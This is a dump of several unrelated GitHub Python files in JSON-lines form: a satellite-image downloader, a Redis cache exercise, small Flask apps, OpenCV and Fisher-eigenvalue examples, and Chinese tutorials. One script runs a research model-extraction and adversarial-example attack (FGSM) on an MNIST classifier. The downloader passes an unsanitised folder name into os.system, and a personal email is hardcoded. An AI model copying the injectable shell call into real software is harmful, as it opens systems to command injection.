get_assets_from_server(download_item)\n basic.outputlogMessage('download a scene (id: %s) that cover the %dth polygon' % (download_item_id, idx))\n\n # check 'analytic_sr' is available, if not, d\n valid_assets = get_downloadable_assets(download_item)\n # print(valid_assets)\n download_asset_types = asset_types.copy()\n if 'analytic_sr' not in valid_assets:\n basic.outputlogMessage('warning, analytic_sr is not available in the scene (id: %s), download analytic instead'%download_item_id)\n download_asset_types.remove('analytic_sr')\n download_asset_types.extend(supp_asset_types) # 'analytic'\n\n #####################################\n for asset in sorted(assets.keys()):\n if asset not in download_asset_types:\n continue\n if check_asset_exist(download_item, asset, save_dir):\n continue\n\n #\n # if activate_and_download_asset(download_item, assets, asset, save_dir,process_num):\n # basic.outputlogMessage('downloaded asset type: %s of scene (%s)' % (asset, download_item_id))\n ############################################################\n ## parallel activate and download sub_tasks\n while True:\n if basic.alive_process_count(sub_tasks) < process_num:\n sub_process = Process(target=activate_and_download_asset,args=(download_item, assets, asset, save_dir,process_num))\n sub_process.start()\n sub_tasks.append(sub_process)\n # time.sleep(200)\n # print('sleep 200')\n break\n else:\n time.sleep(5) # wait, then try again.\n\n\n # save the geometry of this item to disk\n with open(save_geojson_path, 'w') as outfile:\n json.dump(download_item['geometry'], outfile,indent=2)\n # update the geometry of already downloaded geometry\n downloaded_scene_geometry.append(download_item['geometry'])\n\n # wait until all task finished\n while basic.b_all_process_finish(sub_tasks) is False:\n print(datetime.now(),': wait all submitted tasks to finish ')\n time.sleep(10)\n\n else:\n print('code {}, text, {}'.format(res.response.status_code, res.response.text))\n\n return True\n\ndef main(options, args):\n\n polygons_shp = args[0]\n save_folder = args[1] # folder for saving downloaded images\n\n # check training polygons\n assert io_function.is_file_exist(polygons_shp)\n os.system('mkdir -p ' + save_folder)\n\n item_types = options.item_types.split(',') # [\"PSScene4Band\"] # , # PSScene4Band , PSOrthoTile\n\n start_date = datetime.strptime(options.start_date, '%Y-%m-%d') #datetime(year=2018, month=5, day=20)\n end_date = datetime.strptime(options.end_date, '%Y-%m-%d') #end_date\n cloud_cover_thr = options.cloud_cover # 0.01\n\n planet_account = options.planet_account\n process_num = options.process_num\n\n # set Planet API key\n get_and_set_Planet_key(planet_account)\n\n shp_prj = map_projection.get_raster_or_vector_srs_info_proj4(polygons_shp).strip()\n if shp_prj != '+proj=longlat +datum=WGS84 +no_defs':\n # reproject to 4326 projection\n basic.outputlogMessage('reproject %s to latlon'%polygons_shp)\n latlon_shp = io_function.get_name_by_adding_tail(polygons_shp,'latlon')\n if os.path.isfile(latlon_shp) is False:\n vector_gpd.reproject_shapefile(polygons_shp,'EPSG:4326',latlon_shp)\n polygons_shp = latlon_shp\n basic.outputlogMessage('save new shapefile to %s for downloading images' % polygons_shp)\n\n # read polygons\n polygons_json = read_polygons_json(polygons_shp)\n\n read_excluded_scenes(save_folder) # read the excluded_scenes before read download images\n\n #read geometry of images already in \"save_folder\"\n read_down_load_geometry(save_folder)\n\n\n # download images\n download_planet_images(polygons_json, start_date, end_date, cloud_cover_thr, item_types, save_folder,process_num)\n\n #check each downloaded ones are completed, otherwise, remove the incompleted ones\n geojson_list = io_function.get_file_list_by_ext('.geojson',save_folder,bsub_folder=False)\n # print(geojson_list)\n incom_dir = os.path.join(save_folder, 'incomplete_scenes')\n\n for geojson_file in geojson_list:\n scene_id = os.path.splitext(os.path.basename(geojson_file))[0]\n scene_dir = os.path.join(save_folder,scene_id)\n files = io_function.get_file_list_by_pattern(scene_dir,scene_id+'*')\n # print(files)\n if len(files) != len(asset_types):\n if os.path.isdir(incom_dir):\n io_function.mkdir(incom_dir)\n\n basic.outputlogMessage('warning, downloading of %s is not completed, move to incomplete_scenes '%scene_id)\n io_function.movefiletodir(scene_dir,incom_dir,overwrite=True)\n io_function.movefiletodir(geojson_file,incom_dir,overwrite=True)\n\n\n test = 1\n\n\n\n pass\n\nif __name__ == \"__main__\":\n\n usage = \"usage: %prog [options] polygon_shp save_dir\"\n parser = OptionParser(usage=usage, version=\"1.0 2019-10-01\")\n parser.description = 'Introduction: search and download Planet images '\n parser.add_option(\"-s\", \"--start_date\",default='2018-04-30',\n action=\"store\", dest=\"start_date\",\n help=\"start date for inquiry, with format year-month-day, e.g., 2018-05-23\")\n parser.add_option(\"-e\", \"--end_date\",default='2018-06-30',\n action=\"store\", dest=\"end_date\",\n help=\"the end date for inquiry, with format year-month-day, e.g., 2018-05-23\")\n parser.add_option(\"-c\", \"--cloud_cover\",\n action=\"store\", dest=\"cloud_cover\", type=float,\n help=\"the could cover threshold, only accept images with cloud cover less than the threshold\")\n parser.add_option(\"-i\", \"--item_types\",\n action=\"store\", dest=\"item_types\",default='PSScene4Band',\n help=\"the item types, e.g., PSScene4Band,PSOrthoTile\")\n parser.add_option(\"-a\", \"--planet_account\",\n action=\"store\", dest=\"planet_account\",default='huanglingcao@link.cuhk.edu.hk',\n help=\"planet email account, e.g., huanglingcao@link.cuhk.edu.hk\")\n parser.add_option(\"-p\", \"--process_num\",\n action=\"store\", dest=\"process_num\",type=int,default=10,\n help=\"number of processes to download images\")\n\n\n\n (options, args) = parser.parse_args()\n if len(sys.argv) < 2 or len(args) < 1:\n parser.print_help()\n sys.exit(2)\n\n basic.setlogfile('download_planet_images_%s.log'%str(datetime.date(datetime.now())))\n\n main(options, args)\n","repo_name":"yghlc/rs_data_proc","sub_path":"planetScripts/download_planet_img.py","file_name":"download_planet_img.py","file_ext":"py","file_size_in_byte":28721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"31388315385","text":"#!/usr/bin/env python3\n\"\"\"Cache class module\"\"\"\nfrom typing import Callable, Optional, Union\nfrom uuid import uuid4\nfrom functools import wraps\nimport redis\n\n\ndef count_calls(method: Callable) -> Callable:\n \"\"\"decorator func that returns a Callable\"\"\"\n key = method.__qualname__ # sets the function's name as redis key\n\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n \"\"\"wrapper for decorated function\"\"\"\n # increases the value each time the func is called\n self._redis.incr(key)\n return method(self, *args, **kwargs)\n\n return wrapper\n\n\ndef call_history(method: Callable) -> Callable:\n \"\"\"store the history of inputs and outputs\"\"\"\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n \"\"\"wrapper for the decorated function\"\"\"\n inputs = str(args) # stringify passed in arguments\n # stringify return value\n outputs = str(method(self, *args, **kwargs))\n\n # create a key with list as values using rpush\n # method.__qualname__ returns the name of the called func / method\n # and appends :inputs to it e.g `Cache.store:inputs`\n\n # append functions return to redis list `Cache.store:inputs`\n self._redis.rpush(method.__qualname__ + \":inputs\", inputs)\n # append functions return to redis list `Cache.store:outputs`\n self._redis.rpush(method.__qualname__ + \":outputs\", outputs)\n return outputs\n\n return wrapper\n\n\ndef replay(fn: Callable):\n \"\"\"display the history of calls of a particular function\"\"\"\n r = redis.Redis()\n function_name = fn.__qualname__\n # print(function_name)\n value = r.get(function_name) # get the number of times twas called\n # print(value)\n try:\n value = int(value.decode(\"utf-8\"))\n except UnicodeDecodeError:\n value = 0\n except ValueError:\n value = 0\n print(\"{} was called {} times:\".format(function_name, value))\n\n inputs = r.lrange(\"{}:inputs\".format(function_name), 0, -1)\n\n outputs = r.lrange(\"{}:outputs\".format(function_name), 0, -1)\n # abc = zip(inputs, outputs)\n # for a, b in abc:\n # print(a, b)\n\n # since all values are byte-encoded, we av to decode to utf-8\n for input, output in zip(inputs, outputs):\n try:\n input = input.decode(\"utf-8\")\n except UnicodeDecodeError:\n input = \"\"\n\n try:\n output = output.decode(\"utf-8\")\n except UnicodeDecodeError:\n output = \"\"\n\n # print(f\"{function_name}(*{input}) -> {output}\")\n print(\"{}(*{}) -> {}\".format(function_name, input, output))\n\n\nclass Cache:\n \"\"\"Cache class\"\"\"\n\n def __init__(self):\n self._redis = redis.Redis()\n self._redis.flushdb()\n\n @count_calls\n @call_history\n def store(self, data: Union[str, bytes, int, float]) -> str:\n \"\"\"\n The store function takes in a string, bytes, int or float and stores it\n in redis.\n\n data: variable data to be stored\n return: It returns the key that was used to store the data.\n \"\"\"\n uuid_key = str(uuid4()) # generate a random key\n self._redis.set(uuid_key, data) # store data in redis using uuid-key\n return uuid_key\n\n def get(self, key: str,\n fn: Optional[callable] = None) -> Union[str, bytes, int, float]:\n \"\"\"\n take a `key` string argument and an optional `Callable` argument named\n `fn` that will be used to convert the data back to the desired format\n \"\"\"\n value = self._redis.get(key)\n if fn:\n value = fn(value)\n return value\n\n def get_str(self, key: str) -> str:\n \"\"\"automatically parametrize Cache.get with the correct\n conversion function\"\"\"\n value = self._redis.get(key)\n return value.decode(\"utf-8\")\n\n def get_int(self, key: str) -> int:\n \"\"\"automatically parametrize Cache.get with the correct\n conversion function\"\"\"\n value = self._redis.get(key)\n try:\n value = int(value.decode(\"utf-8\"))\n except ValueError:\n value = 0\n return value\n","repo_name":"fashemma007/alx-backend-storage","sub_path":"0x02-redis_basic/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1994722970","text":"import csv\nfrom flask import Flask\nfrom flask_ask import Ask, statement, question, request\n\nfrom filter.filter import Filter\nfrom preprocessor.preprocessor import PreProcessor\nfrom recommender.recommender import Recommender\n\napp = Flask(__name__)\nask = Ask(app, '/')\n\n\n@ask.launch\ndef start_skill():\n startup_message = \"Hi and welcome to 'Secret Santa'. I can help you find a birthday or christmas present \\\n for a family member. Just say 'Alexa, help me find a present!'.\"\n return question(startup_message)\n\n\n@ask.intent('GiftRecommendationIntent')\ndef handle_slot_values():\n recommended_products = get_present_recommendations(request)\n speech_output = Filter.create_speech(recommended_products)\n return statement(speech_output)\n\n\ndef get_present_recommendations(skill_request):\n # Get Slot Values from Alexa Request\n [fav_categories, max_price] = PreProcessor.build_user_vector(skill_request.intent.slots)\n\n # Get Recommendations\n recommended_category = Recommender.get_recommendations(fav_categories)\n\n # Load Data from CSV\n csv_data = csv.DictReader(open('data/final_dataset_metadata_sentiment.csv'))\n\n # Filter Products\n products = Filter.extract_products(csv_data, recommended_category)\n products = Filter.filter_by_pricing(products, max_price)\n products = Filter.sort_by_sentiment(products)\n return products\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"ChriAZi/ws2020-iui","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11507090207","text":"\"\"\"\n编写完毕的代码,在没有运行的时候,称之为程序\n\n正在运行着的代码,就成为进程\n\n进程,除了包含代码以外,还有需要运行的环境等,所以和程序是有区别的\n\"\"\"\n\n#windows 不支持fork,需要在linux环境执行\nimport os\nimport time\n\n#程序执行到os.fork()时,操作系统会创建一个新的进程(子进程),然后复制父进程的所有信息到子进程中\n#然后父进程和子进程都会从fork()函数中得到一个返回值,在子进程中这个值一定是0,而父进程中是子进程的 id号\nret = os.fork()\nif ret==0:\n while True:\n print(\"===子进程===\")\n time.sleep(1)\nelse:\n while True:\n print(\"===父进程===\")\n time.sleep(1)","repo_name":"chenmingrang/python_study","sub_path":"study_further/system_programming_process/fork_demo.py","file_name":"fork_demo.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2351110387","text":"import sys\nimport argparse\n\nfrom common import Logger\nfrom attack import MSAttack\nfrom defense import MSDefense\nimport common as comm\n\n\ndef run_attack(args):\n msd = MSDefense(args)\n msd.load(netv_path='saved_model/pretrained_net/net3conv_mnist.pth')\n\n msa = MSAttack(args, defense_obj=msd)\n msa.load()\n\n comm.accuracy(msa.netS, 'netS', test_loader=msa.test_loader)\n comm.accuracy(msd.netV, 'netV', test_loader=msd.test_loader)\n\n msa.train_netS('saved_model/netS_mnist_temp.pth', data_type=\"REAL\", label_only=False)\n\n comm.accuracy(msa.netS, 'netS', test_loader=msa.test_loader)\n comm.accuracy(msd.netV, 'netV', test_loader=msd.test_loader)\n\n msa.attack(\"FGSM\")\n # msa.attack(\"BIM\")\n # msa.attack(\"CW\")\n # msa.attack(\"PGD\")\n\n\nif __name__ == '__main__':\n sys.stdout = Logger('ms_attack.log', sys.stdout)\n\n args = argparse.ArgumentParser()\n args.add_argument('--cuda', default=False, action='store_true', help='using cuda')\n args.add_argument('--dataset', type=str, default='MNIST')\n args.add_argument('--num_class', type=int, default=10)\n\n args.add_argument('--epoch_b', type=int, default=20, help='for training net V')\n args.add_argument('--epoch_g', type=int, default=5, help='for training net S')\n\n args.add_argument('--lr', type=float, default=0.0001)\n args = args.parse_args()\n\n run_attack(args)\n\n\n","repo_name":"ChiHong-Xtautau/BRP-AdversarialAttacks","sub_path":"run_exp.py","file_name":"run_exp.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26104364446","text":"from datetime import datetime\nimport gc\nimport glob\nimport pandas as pd\nimport os\nimport logging\nimport warnings\n\n# For some reason there are non-unique indexes because multiple data values at the same timestamp exist\n# No clue why but this is probably intended\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n# Flag for testing reasons\nisLinux = True\nOUTPUT_DIR = os.path.join(\".\", \"output\") if not isLinux else \"./output\"\nLOG_DIR = os.path.join(\".\", \"logs\") if not isLinux else \"./logs\"\n\n# Ensuring the directories exist, creating them if they don't\nif not os.path.exists(LOG_DIR):\n print(f\"Log directory not found, creating {LOG_DIR}...\")\n os.makedirs(LOG_DIR)\nif not os.path.exists(OUTPUT_DIR):\n print(f\"Output directory not found, creating {OUTPUT_DIR}...\")\n os.makedirs(OUTPUT_DIR)\n\n# Logging Configuration\ncurrent_time_str = datetime.now().strftime(\"%Y%m%dT%H%M%S\")\nlog_filename = os.path.join(LOG_DIR, f\"{current_time_str}.log\")\nlogging.basicConfig(filename=log_filename, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')\n\n\n# Function to post-process each file and fill any missing spaces\ndef post_process_file(filepath):\n start_time = datetime.now() # Start the timer for this file\n\n try:\n df = pd.read_csv(filepath) # Read the file into a DataFrame\n df['timestamp'] = pd.to_datetime(\n df['timestamp'], format='%m/%d/%Y %H:%M') # Convert to DatetimeIndex\n df.set_index('timestamp', inplace=True) # Set the timestamp as the index for the DataFrame\n\n # Aggregating duplicate indexes by taking the mean of the values\n df = df.groupby(level=0).mean()\n\n df = df.resample('H').asfreq() # Resample to hourly intervals and insert missing rows\n df.fillna(\"NaN\", inplace=True) # Fill all missing values with \"NaN\"\n df.to_csv(filepath) # Write the processed DataFrame back to the CSV file\n\n elapsed_time = datetime.now() - start_time # Calculate elapsed time\n logging.info(f\"Processed file {filepath} in {elapsed_time}\")\n\n # Log all errors\n except Exception as e:\n logging.error(f\"Error processing file {filepath}: {e}\")\n\n\n# Post-process all the files in the old directory\noutput_files = glob.iglob(os.path.join(OUTPUT_DIR, \"*.csv\"))\nfor i, outfile in enumerate(output_files, 1):\n post_process_file(outfile) # Process\n gc.collect() # Collect garbage\n","repo_name":"marcellonovak/eager-tests","sub_path":"postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42173162841","text":"import cv2 as cv\r\nimport numpy as np\r\n\r\n#leer y redimensionar\r\nmet_original = cv.imread(\"Imagenes_para_prueba\\met_hierro_nod.jpg\")\r\nmet_rs = cv.resize(met_original, [int(met_original.shape[1]//3), int(met_original.shape[0]//3)])\r\ncv.imshow(\"METALOGRAFIA_ORIGIANL\", met_rs)\r\n\r\nblank = np.zeros(met_rs.shape, dtype='uint8')\r\ncv.imshow('Blank', blank)\r\n\r\n\r\n#convertir a escala de grises\r\nmet_rs_gray = cv.cvtColor(met_rs, cv.COLOR_BGR2GRAY) \r\n# cv.imshow(\"METALOGRAFIA_REDIMESIONADA_GRIS\", met_rs_gray)\r\n\r\n#FILTRO GAUSSIANO\r\n\r\nmet_rs_gray_gauss = cv.GaussianBlur(met_rs_gray, (5,5), cv.BORDER_DEFAULT)\r\n# cv.imshow(\"METALOGRAFIA_RS_G_GS\", met_rs_gray_gauss)\r\n\r\n#THRESHOLD\r\n\r\nret, thresh = cv.threshold(met_rs_gray, 125, 255, cv.THRESH_BINARY)\r\ncv.imshow(\"METALOGRAFIA_RS_GRAY_THRESH\", thresh)\r\n\r\ncontours, hierarchies = cv.findContours(thresh, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\r\nprint(f'{len(contours)} contour(s) found!')\r\n\r\n#CONTOUR DETECTION (CANNY)\r\n\r\n# met_r_g_cy_gs = cv.Canny(met_rs_gray_gauss, 125, 175)\r\n# cv.imshow(\"METALOGRAFIA_RS_GRAY_GAUSS_CANNY\", met_r_g_cy_gs)\r\n\r\n# met_rs_gray_gauss_3sh = cv.Canny(thresh, 125 , 175)\r\n# cv.imshow(\"METALOGRAFIA_RS_GRAY_GAUSS_3SH_CANNY\", met_rs_gray_gauss_3sh)\r\n\r\n# contours, hierarchies = cv.findContours(met_r_g_cy_gs, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\r\n# print(f'{len(contours)} contour(s) found!')\r\n\r\n# contours, hierarchies = cv.findContours(met_r_g_cy_gs, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\r\n# print(f'{len(contours)} contour(s) found!')\r\n\r\n#DIBUJAR CONTORNOS\r\n\r\ncv.drawContours(blank, contours, -1, (0, 0, 255), 1)\r\ncv.imshow('CONTORNOS DIBUJADOS', blank)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ncv.waitKey(0)\r\n","repo_name":"Javier0CG/Proyect","sub_path":"7_contour_detection.py","file_name":"7_contour_detection.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72528621046","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data.dataset import Subset\nimport torchvision\nfrom torchvision import transforms\nimport asdl\n\n\nclass Net(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 4, 5, bias=False)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(4, 6, 5)\n self.fc1 = nn.Linear(6 * 5 * 5, 6, bias=False)\n self.fc2 = nn.Linear(6, 8)\n self.fc3 = nn.Linear(8, 10)\n\n def forward(self, x):\n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = torch.flatten(x, 1)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n\ndef main():\n top_k = 10\n for fisher_type in [asdl.FISHER_EMP, asdl.FISHER_MC, asdl.FISHER_EXACT]:\n for fisher_shape in [asdl.SHAPE_FULL, asdl.SHAPE_LAYER_WISE]:\n print('=============================')\n print(f'fisher_type: {fisher_type}, fisher_shape: {fisher_shape}')\n eigvals1, _ = asdl.fisher_eig_for_cross_entropy(model, fisher_type, fisher_shape,\n data_loader=trainloader, top_n=top_k, seed=1)\n print(f'Top-{top_k} eigenvalues by power method:')\n print(eigvals1)\n f = asdl.fisher_for_cross_entropy(model, fisher_type, fisher_shape, data_loader=trainloader, seed=1)\n eigvals2 = f.get_eigenvalues(fisher_type, fisher_shape)\n print(f'Top-{top_k} eigenvalues by torch.linalg.eigvalh:')\n print(eigvals2[:top_k].tolist())\n\n\nif __name__ == '__main__':\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n torch.random.manual_seed(1)\n\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n trainset = torchvision.datasets.CIFAR10(root='./data',\n train=True,\n download=True,\n transform=transform)\n n_examples = 128\n trainset = Subset(trainset, range(n_examples))\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=32,\n shuffle=True, num_workers=4)\n model = Net()\n for i, p in enumerate(model.parameters()):\n if i % 2 == 0:\n p.requires_grad_(False)\n model.to(device)\n main()\n","repo_name":"kazukiosawa/asdl","sub_path":"examples/eigenvalues.py","file_name":"eigenvalues.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"76"} +{"seq_id":"41153650289","text":"import cv2\r\nprint('1')\r\n\r\nimport time\r\ncap = cv2.VideoCapture(0) #cam related\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID') #rec related\r\nout =cv2.VideoWriter('output.avi',fourcc,20.0,(640,480)) #rec related\r\nwhile(cap.isOpened()): #.isOpened used to not run when .videocapture argument is wrong\r\n ret, frame = cap.read() #cam related\r\n if ret==True:\r\n print(cap.get(cv2.CAP_PROP_FRAME_WIDTH)) #cam related\r\n print(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) #cam related\r\n out.write(frame) #rec related\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) #cam related\r\n cv2.imshow('frame', gray) #cam related\r\n if cv2.waitKey(1) & 0xFF == ord('q') : #to close video\r\n break\r\n else:\r\n break\r\ncap.release() #cam related\r\ncv2.destroyAllWindows()\r\ntime.sleep(1)","repo_name":"vijay-parasuram/image-proccessing","sub_path":"opencv.py","file_name":"opencv.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40794911826","text":"#IN PROGRESS - need to still abstract into functions and add the index creation functionality\n\nimport csv, itertools, string, cPickle\n \nfile = open(\"moviestats_med.csv\")\nreader = csv.reader(file, delimiter = ',', quotechar = '|')\n\ngeneric = [\"and\",\"&\",\"in\",\"the\",\"of\",\"a\"]\n\n#Store the field names in a list\nfor row in itertools.islice(reader, 1):\n fields = row\n\nmovie = {}\nline = []\nindex = {}\n\n#Insert all the rows in the CSV file into a list\nfor i in reader:\n line.append(i)\n\nline_no = 0\n\n#Loop through all of the rows\nwhile line_no < len(line):\n for list in line:\n i = 0\n #Read one movie into curr_movie for processing\n curr_movie = line[line_no]\n for words in curr_movie:\n #Insert the dictionary key and populate with the relevant objects\n for field_name in fields:\n if i < len(fields):\n movie[field_name] = curr_movie[i]\n i+=1\n \n #Concatenate all the keywords (Name and Cast) for this movie into a string to enable splitting\n keywords = movie['name'] + \" \" + movie['actor1'] + \" \" + movie['actor2'] + \" \" + movie['actor3']\n \n #Split the keywords and remove any generic words\n keywords_split = str.split(keywords)\n keywords_split = [t for t in keywords_split if t.lower() not in generic]\n \n line_no+=1\n\"\"\"\n # Pickle the individual movie dictionary and store it in a file named after the movie title + year\n movie_name = movie['name']\n for char in string.punctuation:\n movie_name = movie_name.replace(char, ' ')\n #It is assumed that the \"date\" field is when the movie was released; therefore, a re-released movie will have a new date.\n file = open(\"data/\" + movie_name + \" \" + movie['date'] + \".pickle\", \"w\")\n cPickle.dump(movie, file)\n file.close()\n\"\"\"\n","repo_name":"change-agent/PyMDB","sub_path":"create_index/create_index_v2.py","file_name":"create_index_v2.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74628311925","text":"#Escreva um programa que faça o computar \"pensar\" em um número\n#inteiro entre 0 e 5 e peça para o usuário tentar descobrir qual foi\n#o númeor escolhido pelo computador.\n#O programa deverá escrever na tela se o usuário venceo ou perdeu\n\nimport random\n\nrandomNumber = random.randint(0,5)\n\nuserNumber = int(input('Digite seu palpite aqui: '))\n\nif randomNumber == userNumber:\n print('Você ganhou meste!')\nelse:\n print('Você perdeu loser')\n","repo_name":"CezarMontenegro/python-exercises","sub_path":"desafio028.py","file_name":"desafio028.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18753040989","text":"from __future__ import absolute_import\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image\r\n\r\nimport autograd.numpy as np\r\nimport autograd.numpy.random as npr\r\nimport data_mnist\r\n\r\ndef load_mnist():\r\n partial_flatten = lambda x : np.reshape(x, (x.shape[0], np.prod(x.shape[1:]))) # 定义一个函数,用于将数组进行部分扁平化\r\n one_hot = lambda x, k: np.array(x[:,None] == np.arange(k)[None, :], dtype=int) # 定义一个函数,用于进行one-hot编码\r\n train_images, train_labels, test_images, test_labels = data_mnist.mnist() # 调用data_mnist模块中的mnist函数加载MNIST数据集\r\n train_images = partial_flatten(train_images) / 255.0 # 对训练图像数据进行部分扁平化并归一化\r\n test_images = partial_flatten(test_images) / 255.0 # 对测试图像数据进行部分扁平化并归一化\r\n train_labels = one_hot(train_labels, 10) # 对训练标签进行one-hot编码\r\n test_labels = one_hot(test_labels, 10) # 对测试标签进行one-hot编码\r\n N_data = train_images.shape[0] # 获取训练图像数据的样本数\r\n\r\n return N_data, train_images, train_labels, test_images, test_labels # 返回加载和处理后的数据\r\n\r\n\r\ndef plot_images(images, ax, ims_per_row=5, padding=5, digit_dimensions=(28, 28),\r\n cmap=matplotlib.cm.binary, vmin=None, vmax=None):\r\n \"\"\"图片格式应该设置为(图片数量N_images x 像素pixels)的矩阵.\"\"\"\r\n N_images = images.shape[0] # 获取图像数据的样本数\r\n N_rows = (N_images - 1) // ims_per_row + 1 # 计算需要的行数\r\n pad_value = np.min(images.ravel()) # 获取图像数据中的最小值作为填充值\r\n concat_images = np.full(((digit_dimensions[0] + padding) * N_rows + padding,\r\n (digit_dimensions[1] + padding) * ims_per_row + padding), pad_value) # 创建一个填充值为pad_value的拼接图像\r\n for i in range(N_images):\r\n cur_image = np.reshape(images[i, :], digit_dimensions) # 将一维图像数据转换为二维图像\r\n row_ix = i // ims_per_row # 计算当前图像所在的行索引\r\n col_ix = i % ims_per_row # 计算当前图像所在的列索引\r\n row_start = padding + (padding + digit_dimensions[0]) * row_ix # 计算当前图像在拼接图像中的行起始位置\r\n col_start = padding + (padding + digit_dimensions[1]) * col_ix # 计算当前图像在拼接图像中的列起始位置\r\n concat_images[row_start: row_start + digit_dimensions[0],\r\n col_start: col_start + digit_dimensions[1]] = cur_image # 将当前图像复制到拼接图像中的相应位置\r\n cax = ax.matshow(concat_images, cmap=cmap, vmin=vmin, vmax=vmax) # 在指定的Axes对象上绘制拼接图像\r\n plt.xticks(np.array([])) # 设置X轴刻度为空\r\n plt.yticks(np.array([])) # 设置Y轴刻度为空\r\n return cax # 返回图像的Colorbar对象\r\n\r\ndef save_images(images, filename, **kwargs):\r\n fig = plt.figure(1) # 创建一个新的Figure对象\r\n fig.clf() # 清空Figure对象中的所有内容\r\n ax = fig.add_subplot(111) # 在Figure对象上添加一个Axes对象\r\n plot_images(images, ax, **kwargs) # 调用plot_images函数绘制拼接图像\r\n fig.patch.set_visible(False) # 设置Figure对象的背景不可见\r\n ax.patch.set_visible(False) # 设置Axes对象的背景不可见\r\n plt.savefig(filename) # 将Figure对象保存为图像文件\r\n\r\n\r\ndef make_pinwheel(radial_std, tangential_std, num_classes, num_per_class, rate,\r\n rs=npr.RandomState(0)):\r\n rads = np.linspace(0, 2*np.pi, num_classes, endpoint=False) # 在0到2π之间均匀生成num_classes个角度值\r\n\r\n features = rs.randn(num_classes*num_per_class, 2) \\\r\n * np.array([radial_std, tangential_std]) # 生成符合正态分布的特征向量\r\n features[:, 0] += 1 # 对特征向量的第一个维度进行偏移\r\n labels = np.repeat(np.arange(num_classes), num_per_class) # 生成重复的标签\r\n\r\n angles = rads[labels] + rate * np.exp(features[:,0]) # 根据标签和特征计算角度\r\n rotations = np.stack([np.cos(angles), -np.sin(angles), np.sin(angles), np.cos(angles)]) # 构建旋转矩阵\r\n rotations = np.reshape(rotations.T, (-1, 2, 2)) # 调整旋转矩阵的形状\r\n\r\n return np.einsum('ti,tij->tj', features, rotations) # 返回生成的数据\r\n","repo_name":"NPU-IIL/DeepLearningBookWriting","sub_path":"Chapter_07/src/autograd/example/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"71107138805","text":"import uuid\nimport datetime\nimport requests\nfrom common.database import Database\nfrom models.control.control import Control\n\nclass Sale(object):\n def __init__(self, name, period, budget, sales, _id=None):\n self.name=name\n self.period=period\n self.budget=float(budget)\n self.sales=sales\n self._id=uuid.uuid4().hex if _id is None else _id\n\n def __repr__(self):\n return \">>map(lambda x:x*x,[2,6,4,8])\n等价于:\n>>>[x*x for x in [2,6,4,8]]\n如果 map 函数中的函数名或 lambda 表达式为 None,则返回一个列表,列表的每个元素为一个元组,由各个序列相应元素组成,其功能类似内建函数 zip\n'''\na = list(zip([1, 2, 3, 4], [5, 6, 7, 8, 9], [11, 22, 33, 44, 55, 66]))\nprint(a)\nb = map([1, 2, 3, 4], [5, 6, 7, 8, 9], [11, 22, 33, 44, 55, 66])\nprint(b)\n\n'''\n2、filter 函数\nfilter 函数的使用格式为:filter(函数或 lambda 表达式,序列)\n功能:利用函数或 lambda 表达式对序列中的每个元素进行筛选,保留函数值为 True 的元素序列。\n'''\n\n# 筛选出序列中的奇数\ndef odd(n):\n if(n % 2):\n return True\nprint(list(filter(odd, [1, 2, 3, 4, 5, 6])))\n\n'''\n3、reduce 函数\nreduce 函数的使用格式为:reduce(函数或 lambda 表达式,序列[,初始值])\n功能:函数或 lambda 